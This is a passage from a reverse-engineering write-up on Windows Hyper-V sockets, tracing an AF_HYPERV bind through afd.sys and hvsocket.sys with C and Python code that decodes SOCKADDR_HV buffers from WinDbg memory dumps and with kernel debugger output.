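static const guid_t HV_GUID_BROADCAST = {0xffffffff, 0xffff, 0xffff,
                                         {0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff}};
static const guid_t HV_GUID_LOOPBACK  = {0xe0e16197, 0xdd56, 0x4a10,
                                         {0x91,0x95,0x5e,0xe7,0xa1,0x55,0xa8,0x38}};

/* Format a GUID as Get-VM shows it: data1-data2-data3-data4[0..1]-data4[2..7]. */
void guid_to_string(const guid_t *g, char out[37])
{
    snprintf(out, 37, "%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x",
             g->data1, g->data2, g->data3,
             g->data4[0], g->data4[1], g->data4[2], g->data4[3],
             g->data4[4], g->data4[5], g->data4[6], g->data4[7]);
}

static int guid_equal(const guid_t *a, const guid_t *b)
{
    return memcmp(a, b, sizeof *a) == 0;
}

/* Classify a VmId in the order the text observed mswsock compare it. */
const char *hv_vmid_kind(const guid_t *id)
{
    if (guid_equal(id, &HV_GUID_LOOPBACK))  return "HV_GUID_LOOPBACK";
    if (guid_equal(id, &HV_GUID_BROADCAST)) return "HV_GUID_BROADCAST";
    if (guid_equal(id, &HV_GUID_ZERO))      return "HV_GUID_ZERO";
    return "specific VM";
}

/* The two user-mode checks described above: the address length must cover a
 * SOCKADDR_HV (assumed: shorter is rejected), and the first dword (Family plus
 * Reserved) must be exactly 0x22. Returns 0 or the Winsock error code. */
int hv_validate_sockaddr(const void *addr, size_t addrlen, sockaddr_hv_t *out)
{
    uint32_t first_dword;
    if (addrlen < SOCKADDR_HV_LEN) return WSAEFAULT;
    memcpy(&first_dword, addr, sizeof first_dword);
    if (first_dword != AF_HYPERV) return WSAEAFNOSUPPORT;
    if (out) memcpy(out, addr, SOCKADDR_HV_LEN);   /* little-endian host assumed */
    return 0;
}

/* Input buffer of IOCTL 0x12003 as it appears in the dump: one leading dword
 * (0 there; assumed to be AFD's share-type field) followed by the address.
 * Like the kernel copy from +4, only the 0x24 bytes after that dword are taken. */
int afd_bind_parse(const void *buf, size_t len, uint32_t *share, sockaddr_hv_t *out)
{
    if (len < 4 + SOCKADDR_HV_LEN) return WSAEFAULT;
    memcpy(share, buf, sizeof *share);
    return hv_validate_sockaddr((const uint8_t *)buf + 4, len - 4, out);
}

/* Dwords copied from the page's dc output, in memory order. */
static const uint32_t CLIENT_ADDR[9] = {
    0x00000022,                                         /* AF_HYPERV, Reserved 0 */
    0x6a964317, 0x4a741d87, 0xa646f9ab, 0x0089049b,     /* VmId of the target VM */
    0xb1d00d3e, 0x4570fe10, 0x487662ad, 0x1b7a9d77 };   /* ServiceId */
static const uint32_t SERVER_BIND_INPUT[10] = {
    0x00000000,                                         /* leading dword */
    0x00000022, 0, 0, 0, 0,                             /* AF_HYPERV, VmId = HV_GUID_ZERO */
    0xb1d00d3e, 0x4570fe10, 0x487662ad, 0x1b7a9d77 };   /* ServiceId */

int main(void)
{
    sockaddr_hv_t a;
    char vm[37], svc[37];
    uint32_t share;

    if (hv_validate_sockaddr(CLIENT_ADDR, sizeof CLIENT_ADDR, &a) == 0) {
        guid_to_string(&a.vm_id, vm);
        guid_to_string(&a.service_id, svc);
        printf("client -> VM %s (%s), service %s\n", vm, hv_vmid_kind(&a.vm_id), svc);
    }
    if (afd_bind_parse(SERVER_BIND_INPUT, sizeof SERVER_BIND_INPUT, &share, &a) == 0) {
        guid_to_string(&a.vm_id, vm);
        guid_to_string(&a.service_id, svc);
        printf("server bind: share %u, VmId %s (%s), service %s\n",
               share, vm, hv_vmid_kind(&a.vm_id), svc);
    }
    return 0;
}
```

<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Run against the dump dwords, the client address decodes to VM 6a964317-1d87-4a74-abf9-46a69b048900 (the Get-VM ID from the start of this section) and the server bind to VmId HV_GUID_ZERO, both for service b1d00d3e-fe10-4570-ad62-7648779d7a1b; the mixed byte order of the first three GUID fields is why the dwords in dc look scrambled next to the textual GUID.</span></div>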
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">On the client side the buffer looks like this:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @rdx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`013d38fc 00000022 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">6a964317 4a741d87 a646f9ab "....C.j..tJ..F.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`013d390c </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0089049b</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">b1d00d3e 4570fe10 487662ad </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">....>.....pE.bvH</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`013d391c </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b7a9d77</span></div>
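<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The two 0x24-byte buffers above (and the HV_CHILD_GUID qwords that appear later in the !list output) can be decoded offline from the WinDbg text. The following Python script is an added example, not code from the article: it assumes the buffer has the documented SOCKADDR_HV layout (Family, Reserved, VmId, ServiceId) and rebuilds the bytes from the dc dump lines, which are reproduced here as constructed sample input.</span></div>

```python
import re
import struct
import uuid
from typing import List, NamedTuple

# Assumed layout: SOCKADDR_HV from hvsocket.h
#   USHORT Family; USHORT Reserved; GUID VmId; GUID ServiceId
# 2 + 2 + 16 + 16 = 0x24 bytes, the same Length the MDL in the article reports.
AF_HYPERV = 0x22
SOCKADDR_HV_SIZE = 0x24

# Well-known Hyper-V sockets VmId wildcard (documented as HV_GUID_CHILDREN);
# the !list output in the article labels this value HV_CHILD_GUID.
HV_GUID_CHILDREN = uuid.UUID("90db8b89-0d35-4f79-8ce9-49ea0ac8b7cd")

# One `dc` line: address, one to four little-endian DWORDs, then an ASCII
# column that is ignored.
_DC_LINE = re.compile(
    r"^\s*(?P<addr>[0-9a-f]{8}`[0-9a-f]{8})\s+(?P<words>(?:[0-9a-f]{8}\s*){1,4})",
    re.IGNORECASE,
)


class SockaddrHv(NamedTuple):
    family: int
    reserved: int
    vm_id: uuid.UUID
    service_id: uuid.UUID


def dc_lines_to_bytes(lines: List[str]) -> bytes:
    """Reassemble raw memory, in address order, from WinDbg `dc` output."""
    out = bytearray()
    for line in lines:
        m = _DC_LINE.match(line)
        if not m:
            continue  # e.g. the "WINDBG>dc @rdx" prompt line
        for word in m.group("words").split():
            out += struct.pack("<I", int(word, 16))  # dc shows LE DWORDs
    return bytes(out)


def parse_sockaddr_hv(raw: bytes) -> SockaddrHv:
    """Decode the bind buffer; rejects anything that is not AF_HYPERV."""
    if len(raw) < SOCKADDR_HV_SIZE:
        raise ValueError(f"need {SOCKADDR_HV_SIZE} bytes, got {len(raw)}")
    family, reserved, vm, svc = struct.unpack_from("<HH16s16s", raw)
    if family != AF_HYPERV:
        raise ValueError(f"address family 0x{family:x} is not AF_HYPERV")
    # bytes_le: Data1..Data3 are stored little-endian, as Windows lays out GUIDs
    return SockaddrHv(family, reserved,
                      uuid.UUID(bytes_le=vm), uuid.UUID(bytes_le=svc))


def qwords_to_guid(qword_tokens: List[str]) -> uuid.UUID:
    """Decode a GUID shown as two WinDbg qwords (dq / !list style tokens)."""
    raw = b"".join(struct.pack("<Q", int(t.replace("`", ""), 16))
                   for t in qword_tokens)
    return uuid.UUID(bytes_le=raw)


# Constructed sample input: the server- and client-side dumps from the article.
SERVER_DC = [
    "WINDBG>dc @rdx",
    '00000000`0122308c 00000022 00000000 00000000 00000000 "...............',
    "00000000`0122309c 00000000 b1d00d3e 4570fe10 487662ad ....>.....pE.bvH",
    "00000000`012230ac 1b7a9d77",
]
CLIENT_DC = [
    "WINDBG>dc @rdx",
    '00000000`013d38fc 00000022 6a964317 4a741d87 a646f9ab "....C.j..tJ..F.',
    "00000000`013d390c 0089049b b1d00d3e 4570fe10 487662ad ....>.....pE.bvH",
    "00000000`013d391c 1b7a9d77",
]
# The two qwords the article marks as HV_CHILD_GUID in the !list output.
HV_CHILD_GUID_QWORDS = ["4f790d35`90db8b89", "cdb7c80a`ea49e98c"]


def describe(label: str, lines: List[str]) -> str:
    sa = parse_sockaddr_hv(dc_lines_to_bytes(lines))
    return (f"{label}: family=0x{sa.family:x} reserved={sa.reserved} "
            f"VmId={{{sa.vm_id}}} ServiceId={{{sa.service_id}}}")


if __name__ == "__main__":
    # Server side binds with an all-zero VmId; the client carries a concrete
    # partition GUID. The ServiceId (blue in the article) is identical on both.
    print(describe("server", SERVER_DC))
    print(describe("client", CLIENT_DC))
    print(f"HV_CHILD_GUID={{{qwords_to_guid(HV_CHILD_GUID_QWORDS)}}}")
```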
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next comes a call to nt!IoAllocateMdl (Length equals 0x24):</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="87" src="https://lh4.googleusercontent.com/--JAWbY9CrT7ooVn61-lAHucYDLGnkJP4plqy_cBiDgE0lz08sspUL4cMdyZUtP0srQT1rWoyblnL3aA4n3kT-O7wl1W1Vi64NgCFyI7WQENvkc2qS9aUxM6huKs3TkcYSvD3HcFA1xZBQC2fw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="152" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt nt!_MDL @rax – the result of IoAllocateMdl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Next : (null) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Size : 0n56</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x00a MdlFlags : 0n8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x00c AllocationProcessorNumber : 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x00e Reserved : 0xffff</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x010 Process : 0xffffda85`293c9840 _EPROCESS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x018 MappedSystemVa : 0xffff9080`27c4903c Void</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x020 StartVa : 0x00000000`01223000 Void</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x028 ByteCount : 0x24</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x02c ByteOffset : 0x88</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The address of UserBuffer from the DeviceIoControl parameters is loaded into rcx; then the pages are brought in from the pagefile (if they were paged out) and locked in memory by nt!MmProbeAndLockPages. The locked 0x24-byte buffer is then mapped by nt!MmMapLockedPagesSpecifyCache with caching type </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">cached</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and the options HighPagePriority and MdlMappingNoExecute set.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBindSecurity -> afd!AfdTLBind -> afd!AfdTLIoControl (from afd!AfdTLIoControl control passes to afd!AfdTLBindComplete and then to afd!AfdTLBindComplete2, and only after that do we return to the exit from afd!AfdTLIoControl)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBindSecurity: </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The 1st parameter - the same IRP</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The 2nd parameter - _AFD_CONNECTION object</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, afd!AfdTLBind is called (with the same parameters). </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In afd!AfdTLBind </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="46" src="https://lh4.googleusercontent.com/MYdQUEd4oVBVFgr5ojxrcMNEV3jmb8vH_DCa5YmaiYuMprj3qR3Rk-elCicsyvDyU7yCHt2W8v0Z3lv2IY07-rY6DdRNRSa0anbpRJzaXuRsm5iWu090MubNcgNryfLC2-0nS8X_vMZZ_8ZGKw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="193" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlProviderEndpointDispatch is loaded into rcx before AfdTLBindComplete is loaded into rax:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="33" src="https://lh4.googleusercontent.com/RT9jIynOgnT9Bxmujp0Kr0oyf06JO2ZPbrTJNxAvYP42Gb6MkrlwMHeKO9-Pd31HP9tA3qYCwcJaKwLsLDLEa_2HyBNQko5WlRMWognUSRymcRopxjj-AdjgiovA7B4rfsbFC6-LJc5GzC4AKQ" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="373" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dps @rcx L50 – table of hvsocket.sys handlers</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c048 fffff803`db952460 hvsocket!VmbusTlCommonProviderCloseEndpoint</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c050 fffff803`db963210 hvsocket!VmbusTlEndpointIoControlEndpoint</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c058 fffff803`db95a8c0 hvsocket!TlDefaultRequestQueryDispatchEndpoint</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c060 fffff803`db952460 hvsocket!VmbusTlCommonProviderCloseEndpoint</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c068 fffff803`db963be0 hvsocket!VmbusTlListenerIoControlEndpoint</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c070 fffff803`db95a8c0 hvsocket!TlDefaultRequestQueryDispatchEndpoint</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c078 fffff803`db95a8d0 hvsocket!TlDefaultRequestResume</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c080 fffff803`db954300 hvsocket!VmbusTlConnectionCloseEndpoint</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c088 fffff803`db965fc0 hvsocket!VmbusTlConnectionIoControlEndpoint</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c090 fffff803`db95a8c0 hvsocket!TlDefaultRequestQueryDispatchEndpoint</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c098 fffff803`db954c60 hvsocket!VmbusTlConnectionSend</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0a0 fffff803`db954ea0 hvsocket!VmbusTlConnectionReceive</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0a8 fffff803`db9585a0 hvsocket!VmbusTlConnectionDisconnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0b0 00000001`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0b8 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0c0 fffff803`db969de0 hvsocket!VmbusTlXPartAcceptConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0c8 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0d0 fffff803`db959830 hvsocket!VmbusTlXPartProcessIoRequest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0d8 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0e0 fffff803`db959890 hvsocket!VmbusTlXPartIoRequestCompleted</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0e8 fffff803`db959950 hvsocket!VmbusTlXPartReleaseReceiveIndications</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0f0 fffff803`db969ee0 hvsocket!VmbusTlXPartDisconnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c0f8 fffff803`db959820 hvsocket!VmbusTlXPartSendConsumptionNotice</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c100 fffff803`db959940 hvsocket!VmbusTlXPartIsIncomingEmpty</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c108 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c110 00000001`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c118 fffff803`db96a430 hvsocket!VmbusTlLoopbackSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c120 fffff803`db96a6b0 hvsocket!VmbusTlLoopbackAcceptConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c128 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c130 fffff803`db959ed0 hvsocket!VmbusTlLoopbackProcessIoRequest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c138 fffff803`db96a850 hvsocket!VmbusTlLoopbackPostprocessIoRequest</span></div>
